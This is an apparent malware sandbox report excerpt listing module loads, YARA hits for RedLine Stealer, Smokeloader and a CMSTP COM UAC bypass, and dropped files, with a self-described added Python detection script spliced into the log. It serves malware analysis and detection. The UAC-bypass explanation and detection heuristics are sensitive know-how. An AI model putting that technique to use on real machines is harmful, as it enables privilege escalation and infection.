                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe Section loaded: comsvcs.dll
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe Section loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe Section loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe Section loaded: cmlua.dll
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe Section loaded: cmutil.dll
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exe Section loaded: version.dll
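The per-process module lists above carry more signal than their length suggests once they are grouped by process: 93D2.exe, running from the user's Temp directory, loads cmlua.dll and cmutil.dll, which host the auto-elevating CMSTPLUA COM server that is commonly instantiated from a non-elevated process to obtain an elevated command execution without a UAC prompt; 8E91.exe in the same directory pulls in winhttp.dll and schannel.dll; and regsvr32.exe (a signed Windows binary) loads wininet.dll. The Python below is an added example, not part of the report or of Joe Sandbox, that parses lines in the report's own "Section loaded" format and applies three such module-combination rules. The input is a constructed handful of lines mirroring entries above, and the DLL sets, the path patterns and the list of living-off-the-land binaries are assumptions to tune for a given estate.

```python
import re
from collections import defaultdict

# Constructed sample input in the report's fused "Section loaded" format
# (the process path runs straight into the text "Section loaded:").
SAMPLE_LINES = r"""
Source: C:\Users\user\AppData\Local\Temp\93D2.exeSection loaded: cmlua.dll
Source: C:\Users\user\AppData\Local\Temp\93D2.exeSection loaded: cmutil.dll
Source: C:\Users\user\AppData\Local\Temp\93D2.exeSection loaded: comsvcs.dll
Source: C:\Windows\explorer.exeSection loaded: taskschd.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\8E91.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\8E91.exeSection loaded: schannel.dll
"""

LINE_RE = re.compile(r"^Source:\s*(?P<path>.+?)Section loaded:\s*(?P<dll>\S+)", re.I)

# Assumed heuristics, not the sandbox's own rules.
UAC_COM_DLLS = {"cmlua.dll", "cmutil.dll"}            # CMSTPLUA COM elevation server
NET_DLLS = {"wininet.dll", "winhttp.dll", "ws2_32.dll"}
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\users\\public\\")
LOLBINS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "cmstp.exe"}


def parse_section_loads(text):
    """Group loaded modules per process path, keeping each DLL once (the
    report repeats loads that happen more than once)."""
    loads = defaultdict(list)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        path, dll = m.group("path"), m.group("dll").lower()
        if dll not in loads[path]:
            loads[path].append(dll)
    return dict(loads)


def flag(loads):
    """Return (process path, reason) pairs for suspicious module combinations."""
    findings = []
    for path, dlls in loads.items():
        low = path.lower()
        name = low.rsplit("\\", 1)[-1]
        mods = set(dlls)
        in_windows = low.startswith("c:\\windows\\")
        if mods & UAC_COM_DLLS and not in_windows:
            findings.append((path, "loads cmlua.dll/cmutil.dll outside C:\\Windows: "
                                   "CMSTPLUA COM elevation (UAC bypass) pattern"))
        if mods & NET_DLLS and any(p in low for p in USER_WRITABLE):
            findings.append((path, "network stack loaded by a binary in a user-writable directory"))
        if name in LOLBINS and mods & NET_DLLS:
            findings.append((path, f"{name} loaded a network stack: possible payload host"))
    return findings


if __name__ == "__main__":
    for path, reason in flag(parse_section_loads(SAMPLE_LINES)):
        print(f"{path}: {reason}")
```

In a live environment the same rules run over Sysmon Event ID 7 (image loaded) rather than over report text; the grouping and the rule bodies stay the same. explorer.exe loading taskschd.dll is deliberately not flagged here because explorer legitimately uses the Task Scheduler COM API, so that load is only meaningful in combination with the thread-injection findings elsewhere in the report.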
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mscms.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: clusapi.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winmm.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wininet.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: coloradapterclient.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeSection loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\A6A0.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: textinputframework.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: edputil.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: appresolver.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: bcp47langs.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: slc.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: sppc.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\AppData\Local\Temp\A6A0.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: textinputframework.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: shfolder.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: rstrtmgr.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: msacm32.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: winmmbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: winmmbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: explorerframe.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: sfc.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpSection loaded: sfc_os.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: ccQGH1mKws.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 10.2.93D2.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 16.2.93D2.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 29.0.BB62.exe.b80000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
Source: 00000001.00000002.1549966457.0000000000529000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000018.00000002.1889731561.0000000002800000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.1793881515.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000027.00000002.2031095427.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000002.1793962447.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000001.00000002.1550099786.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000027.00000002.2031135707.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000027.00000002.2031606474.0000000002DCA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000002.1549874616.0000000000500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000021.00000002.2034312044.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000002.1794086138.0000000000729000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000002.1549853433.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000002.1793860457.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000027.00000002.2031801803.0000000004851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000021.00000002.2033637211.0000000002A00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000007.00000002.1767566996.000000000233D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: C:\Users\user\AppData\Local\Temp\BB62.exe, type: DROPPED | Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
Source: 97EA.dll.2.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 8837.exe.2.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 671C.exe.2.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: csrss.exe.8.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: anyburnfree.exe.21.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: IMAP List Mailboxes 65.exe.27.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: syncUpd[1].exe.34.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: nsfDE87.tmp.34.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@84/98@522/34
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: 16_2_004023F2 LoadLibraryA,LookupPrivilegeValueA,AdjustTokenPrivileges,LoadLibraryA,NtShutdownSystem,16_2_004023F2
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_0052C34C CreateToolhelp32Snapshot,Module32First,1_2_0052C34C
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\afratej
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeMutant created: \Sessions\1\BaseNamedObjects\jmuZVxzUSQKZJ
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5408:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:3412:64:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4248
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8837.tmp
                  Source: Yara matchFile source: 38.0.BroomSetup.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000026.00000000.1927662842.0000000000401000.00000020.00000001.01000000.0000001A.sdmp, type: MEMORY
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe, type: DROPPED
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                  Source: ccQGH1mKws.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeFile read: C:\Users\desktop.ini
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
